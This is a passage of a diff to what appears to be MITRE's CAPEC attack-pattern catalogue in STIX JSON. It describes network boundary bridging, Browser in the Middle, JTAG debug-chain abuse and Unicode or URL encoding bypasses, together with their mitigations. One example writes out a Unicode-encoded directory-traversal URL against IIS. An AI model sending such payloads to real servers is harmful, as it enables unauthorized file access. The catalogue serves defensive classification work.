OS or firmware to enable persistence. 
Once the adversary has access to the device’s configurations, they could modify it to redirect network traffic through other network infrastructure.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify potential targets: An adversary identifies network boundary devices that can be compromised.

  2. Techniques
    The adversary traces network traffic to identify which devices the traffic flows through. Additionally, the adversary can identify devices using fingerprinting methods or locating the management page to determine identifying information about the device.

Experiment

  1. Compromise targets: The adversary must compromise the identified targets in the previous step.

  2. Techniques
    Once the device is identified, the adversary can attempt to input known default credentials for the device to gain access to the management console.
    Adversaries with sufficient identifying knowledge about the target device can exploit known vulnerabilities in network devices to obtain administrative access.

Exploit

  1. Bridge Networks: The adversary changes the configuration of the compromised network device to connect the networks the device was segmenting. Depending on the type of network boundary device and its capabilities, bridging can be implemented using various methods.

  2. Techniques
    The adversary can abuse Network Address Translation (NAT) in firewalls and routers to manipulate traffic flow to their own design. With control of the network device, the adversary can manipulate NAT by either using existing configurations or creating their own to allow two previously unconnected networks to communicate.
    Some network devices can be configured to become a proxy server. Adversaries can set up or exploit an existing proxy server on compromised network devices to create a bridge between separate networks.
", + "x_capec_extended_description": "\n Network boundary devices are network devices such as routers and firewalls which segment networks by restricting certain types of traffic from flowing through the device. Network boundary devices are often directly accessible through a portal page for management purposes. An adversary’s goal when conducting network boundary bridging is to connect networks which are being segmented by the device. To do so, the adversary must first compromise the network boundary device.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have control of a network boundary device." + ], + "x_capec_resources_required": [ + "The adversary requires either high privileges or full control of a boundary device on a target network." + ], + "x_capec_skills_required": { + "Medium": "The adversary must understand how to manage the target network device to create or edit policies which will bridge networks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure network devices are storing credentials in encrypted stores", + "id": "course-of-action--32725b6b-67e3-42a5-90c3-3df837752e22", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93781594-95f7-4a98-8d8d-c63912350df5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--32725b6b-67e3-42a5-90c3-3df837752e22", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the principle of least privilege and restrict administrative duties to as few accounts as possible. Ensure these privileged accounts are secured with strong credentials which do not overlap with other network devices.", + "id": "course-of-action--038c3205-b918-4a35-84f2-e2293c5939db", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc655a9c-2a77-4423-9b9f-db489ac138b6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--038c3205-b918-4a35-84f2-e2293c5939db", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: When possible, configure network boundary devices to use MFA.", + "id": "course-of-action--6cc78d5e-6d76-4d60-bc22-2cf852698416", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + 
"created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--783c4799-804f-4421-8e13-a415b2f6ba48", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6cc78d5e-6d76-4d60-bc22-2cf852698416", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Change the default configuration for network devices to harden their security profiles. Default configurations are often enabled with insecure features to allow ease of installation and management. However, these configurations can be easily discovered and exploited by adversaries.", + "id": "course-of-action--4b5892a7-8b4a-451f-ae7a-1b25ce5ece40", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7780fd5c-50d4-4542-9e3f-50121cc5dbf5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b5892a7-8b4a-451f-ae7a-1b25ce5ece40", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform integrity checks on audit logs for network device management and review them to identify abnormalities in configurations.", + "id": "course-of-action--dff06017-2189-4ee8-875b-d7c722ceb8fb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dff06017-2189-4ee8-875b-d7c722ceb8fb", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Prevent network boundary devices from being physically accessed by unauthorized personnel to prevent tampering.", + "id": "course-of-action--8395680e-e9c6-4c7b-a94f-e5d4bdd9e5c0", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b91c573-2031-4024-a179-a9a719c76d8a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--8395680e-e9c6-4c7b-a94f-e5d4bdd9e5c0", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits the inherent functionalities of a web browser, in order to establish an unnoticed remote desktop connection in the victim's browser to the adversary's system. The adversary must deploy a web client with a remote desktop session that the victim can access.", + "external_references": [ + { + "external_id": "CAPEC-701", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/701.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "description": "Tommasi F., Catalano, C., Taurino I., Browser-in-the-Middle (BitM) attack, 2021--04---17", + "external_id": "REF-747", + "source_name": "reference_from_CAPEC", + "url": "https://link.springer.com/article/10.1007/s10207-021-00548-5#citeas" + } + ], + "id": "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Browser in the Middle (BiTM)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + 
"Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify potential targets: The adversary identifies an application or service that the target is likely to use.

  2. Techniques
    The adversary stands up a server to host the transparent browser and entices victims to use it by using a domain name similar to the legitimate application. In addition to the transparent browser, the adversary could also install a web proxy, sniffer, keylogger, and other tools to assist in their goals.

Experiment

  1. Lure victims: The adversary crafts a phishing campaign to lure unsuspecting victims into using the transparent browser.

  2. Techniques
    An adversary can create a convincing email with a link to download the web client and interact with the transparent browser.

Exploit

  1. Monitor and Manipulate Data: When the victim establishes the connection to the transparent browser, the adversary can view victim activity and make alterations to what the victim sees when browsing the web.

  2. Techniques
    Once a victim has established a connection to the transparent browser, the adversary can use installed tools such as a web proxy, keylogger, or additional malicious browser extensions to gather and manipulate data or impersonate the victim.
", + "x_capec_extended_description": "\n Unlike Adversary in the Browser, the victim does not need to install a malicious application. Browser in the Middle uses the inherent functionalities of a web browser to convince the victim they are browsing normally under the assumption that the connection is secure. All the actions performed by the victim in the open window are actually performed on the machine of the adversary. These victim-authenticated sessions are available to the adversary to use. All entered data such as passwords and usernames can be logged by the adversary and the content displayed to the victim can be altered arbitrarily. Varieties of multifactor authentication which rely solely on user input and do not use a form of hardware-based secret exchange are vulnerable to browser in the middle.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must create a convincing web client to establish the connection. The victim then needs to be lured onto the adversary's webpage. In addition, the victim's machine must not use local authentication APIs, a hardware token, or a Trusted Platform Module (TPM) to authenticate." + ], + "x_capec_resources_required": [ + "A web application with a client is needed to enable the victim's browser to establish a remote desktop connection to the system of the adversary." 
+ ], + "x_capec_skills_required": { + "Medium": "" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use strong, mutual authentication to fully authenticate with both ends of any communications channel", + "id": "course-of-action--f44bc993-82a0-449a-9b98-04b0c109d981", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-701-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f66607a-0817-42cb-a00b-c67a8e30b827", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f44bc993-82a0-449a-9b98-04b0c109d981", + "spec_version": "2.1", + "target_ref": "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits incorrect chaining or granularity of hardware debug components in order to gain unauthorized access to debug functionality on a chip. 
This happens when authorization is not checked on a per function basis and is assumed for a chain or group of debug functionality.\n ", + "external_references": [ + { + "external_id": "CAPEC-702", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/702.html" + }, + { + "external_id": "CWE-1296", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1296.html" + }, + { + "description": "Hewlett-Packard Journal, Overview of the Test Access Port, 1994--12", + "external_id": "REF-748", + "source_name": "reference_from_CAPEC", + "url": "https://www.hpl.hp.com/hpjournal/94dec/dec94a7a.pdf" + }, + { + "description": "Finding Faults with the Test Access Port (TAP), 2017--06---12", + "external_id": "REF-749", + "source_name": "reference_from_CAPEC", + "url": "https://flynn.com/2017/06/12/finding-faults-with-the-test-access-port-tap/" + }, + { + "description": "Technical Guide to JTAG", + "external_id": "REF-750", + "source_name": "reference_from_CAPEC", + "url": "https://www.xjtag.com/about-jtag/jtag-a-technical-overview/" + } + ], + "id": "attack-pattern--a8c03df8-2c83-493f-8e92-4c8afac0ed40", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Exploiting Incorrect Chaining or Granularity of Hardware Debug Components", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A System-on-Chip (SoC) might give regular users access to the SoC-level TAP, but does not want to give access to all of the internal TAPs (e.g., Core). 
If any of the internal TAPs were incorrectly chained to the SoC-level TAP, this would grant regular users access to the internal TAPs and allow them to execute commands there.\n ", + "\n Suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.). Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented, and the attacker can gain unauthorized access.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find and scan debug interface: The adversary must first find and scan a debug interface to determine what they are authorized to use and what devices are chained to that interface.

  2. Techniques
    Use a JTAGulator on a JTAG interface to determine the correct pin configuration, baud rate, and number of devices in the chain

Experiment

  1. Connect to debug interface: The adversary next connects a device to the JTAG interface using the properties found in the explore phase so that they can send commands. The adversary sends some test commands to make sure the connection is working.

  2. Techniques
    Connect a device such as a BusPirate or UM232H to the JTAG interface and connect using pin layout found from the JTAGulator

Exploit

  1. Move along debug chain: Once the adversary has connected to the main TAP, or JTAG interface, they will move along the TAP chain to see what debug interfaces might be available on that chain.

  2. Techniques
    Run a command such as “scan_chain” to see what TAPs are available in the chain.
", + "x_capec_extended_description": "\n Chip designers often include design elements in a chip for debugging and troubleshooting such as:\n \n Various Test Access Ports (TAPs) which allow boundary scan commands to be executed.\n Scan cells that allow the chip to be used as a \"stimulus and response\" mechanism for scanning the internal components of a chip.\n Custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs.\n \n Because devices commonly have multiple chips and debug components, designers will connect debug components and expose them through a single external interface, which is referred to as “chaining”. Logic errors during design or synthesis could misconfigure the chaining of the debug components, which could allow unintended access. TAPs are also commonly referred to as JTAG interfaces.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Hardware device has an exposed debug interface" + ], + "x_capec_resources_required": [ + "A device to scan a TAP or JTAG interface, such as a JTAGulator", + "A device to communicate on a TAP or JTAG interface, such as a BusPirate" + ], + "x_capec_skills_required": { + "Medium": "Ability to operate devices to scan and connect to an exposed debug interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Ensure that debug components are properly chained, and their granularity is maintained at different authorization levels", + "id": "course-of-action--77da5dae-701a-472d-bf4f-06b848567b8c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-702-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", 
+ "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49194375-4e3f-4111-a459-90634fe46e45", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--77da5dae-701a-472d-bf4f-06b848567b8c", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8c03df8-2c83-493f-8e92-4c8afac0ed40", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform Post-silicon validation tests at various authorization levels to ensure that debug components are only accessible to authorized users", + "id": "course-of-action--b9d223ef-6328-4391-8c88-2d62f27c78ff", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-702-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bc54e41d-0855-4da4-a127-65b1ceae9ba3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b9d223ef-6328-4391-8c88-2d62f27c78ff", + "spec_version": "2.1", + "target_ref": "attack-pattern--a8c03df8-2c83-493f-8e92-4c8afac0ed40", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may provide a Unicode string to a system component 
that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.", + "external_references": [ + { + "external_id": "CAPEC-71", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/71.html" + }, + { + "external_id": "CWE-176", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/176.html" + }, + { + "external_id": "CWE-179", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "Unicode Encoding", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Unicode_Encoding" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Unicode Encoding to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A very common technique for a Unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is\n http://target.server/some_directory/../../../winnt\n In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters.\n In October 2000, an adversary publicly revealed that Microsoft's IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The Unicode translations are\n . 
yields C0 AE/ yields C0 AF\\ yields C1 9C\n Using this conversion, the previously displayed URL can be encoded as\n http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winntSee also: CVE-2000-0884" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe entry points to locate vulnerabilities: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various Unicode encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Try to use Unicode encoding of content in Scripts in order to bypass validation routines.
    Try to use Unicode encoding of content in HTML in order to bypass validation routines.
    Try to use Unicode encoding of content in CSS in order to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Filtering is performed on data that has not be properly canonicalized." + ], + "x_capec_skills_required": { + "Medium": "An attacker needs to understand Unicode encodings and have an idea (or be able to find out) what system components may not be Unicode aware." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII.", + "id": "course-of-action--9a5363ad-5ca7-45b1-a710-9ee89914b20d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-71-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7431af74-11f2-4cf7-aa2d-aa0b07ff9256", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a5363ad-5ca7-45b1-a710-9ee89914b20d", + "spec_version": "2.1", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that filtering or input validation is applied to canonical data.", + "id": "course-of-action--3b44d922-39ec-42cc-ae93-00b251aa514e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-71-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--caeb99db-8036-444d-a785-c9ac795a3cf9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b44d922-39ec-42cc-ae93-00b251aa514e", + "spec_version": "2.1", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--25524460-3133-4541-a10d-84d3fd8a1db3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "spec_version": "2.1", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL. 
An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.", + "external_references": [ + { + "external_id": "CAPEC-72", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/72.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": 